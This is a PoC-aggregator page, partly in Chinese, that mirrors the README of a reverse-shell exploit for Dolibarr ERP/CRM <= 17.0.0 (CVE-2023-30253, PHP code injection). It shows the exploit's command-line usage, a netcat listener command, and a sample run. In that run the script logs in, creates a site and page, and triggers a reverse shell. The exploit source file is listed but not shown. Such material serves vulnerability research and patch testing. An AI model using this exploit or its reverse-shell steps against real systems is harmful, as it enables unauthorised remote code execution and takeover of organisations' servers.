POC详情: 6e5bd8bd57b71d17df715ccd8f91752b4f3a0a35

来源
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
关联漏洞
标题: Dolibarr 操作系统命令注入漏洞 (CVE-2023-30253)
描述:Dolibarr是一个应用软件。一个现代软件包,可帮助管理您组织的活动。 Dolibarr 17.0.1之前版本存在安全漏洞,该漏洞源于可以通过大写操作远程执行代码。
描述
Reverse Shell POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253), PHP Code Injection
介绍
# POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)
Reverse Shell POC exploit for **`Dolibarr <= 17.0.0 (CVE-2023-30253)`**, PHP Code Injection

See more details about the vulnerability [**here**](https://www.swascan.com/security-advisory-dolibarr-17-0-0/)

## PoC

Help of exploit:
```
➜  python3 exploit.py -h
usage: python3 exploit.py <TARGET_HOSTNAME> <USERNAME> <PASSWORD> <LHOST> <LPORT>
example: python3 exploit.py http://example.com login password 127.0.0.1 9001

---[Reverse Shell Exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)]---

positional arguments:
  hostname    Target hostname
  username    Username of Dolibarr ERP/CRM
  password    Password of Dolibarr ERP/CRM
  lhost       Listening host for reverse shell
  lport       Listening port for reverse shell

options:
  -h, --help  show this help message and exit
```

Run the netcat on your host:
``` 
➜ nc -lvnp 9001
```
Run the exploit (example):
```
➜ python3 exploit.py http://example.com login passsword 127.0.0.1 9001
[*] Trying authentication...
[**] Login: login
[**] Password: password
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
```
文件快照

 [4.0K]  /data/pocs/6e5bd8bd57b71d17df715ccd8f91752b4f3a0a35
├── [ 16K]  exploit.py
└── [1.2K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。